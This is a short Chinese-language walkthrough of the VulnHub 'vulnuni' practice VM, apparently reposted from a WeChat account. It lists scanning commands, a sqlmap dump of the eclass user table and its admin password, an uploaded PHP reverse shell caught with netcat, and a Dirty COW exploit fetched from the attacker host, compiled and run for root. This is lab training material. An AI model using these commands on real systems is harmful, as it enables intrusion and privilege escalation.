今天实践的是vulnhub的vulnuni镜像,
下载地址,https://download.vulnhub.com/vulnuni/vulnuni1.0.1.ova,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址192.168.0.193,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.193,
有web服务,目录扫描不够用,上爬虫,
浏览器访问http://192.168.0.193/vulnuni-eclass,
尝试admin/admin登录失败,但是提示了主机名vulnuni.local,
添加到/etc/hosts中,再次访问http://vulnuni.local/vulnuni-eclass,
用burpsuite把登录的请求抓到,保存到vulnuni文件中,
用sqlmap做数据库暴破,sqlmap -r vulnuni --dbs --batch,
继续暴破数据表里的字段,sqlmap -r vulnuni -D eclass -T user -C password --dump --batch,获取到能用的密码,ilikecats89,
再次用浏览器登录http://vulnuni.local/vulnuni-eclass,
用户名密码是admin/ilikecats89,
找到一个能上传webshell的页面,
在kali攻击机上准备webshell文件,
cp /usr/share/webshells/php/php-reverse-shell.php php-reverse-shell.php,
压缩成zip文件上传,
kali攻击机上开启反弹shell监听,nc -lvp 4444,
浏览器访问http://vulnuni.local/vulnuni-eclass/courses/tmpUnzipping/php-reverse-shell.php,
获取到反弹shell,不是root,需要提权,
查询到系统内核版本,存在脏牛漏洞,
找到一个可利用的方案,
把代码保存到kali攻击机上的dirtycow.c文件,
kali攻击机上开启http下载,python2 -m SimpleHTTPServer,
靶机上进入tmp目录,下载代码文件,
wget http://192.168.0.194:8000/dirtycow.c,
编译,gcc dirtycow.c -o root -pthread,
执行,./root,获取到root权限,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之vulnuni的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论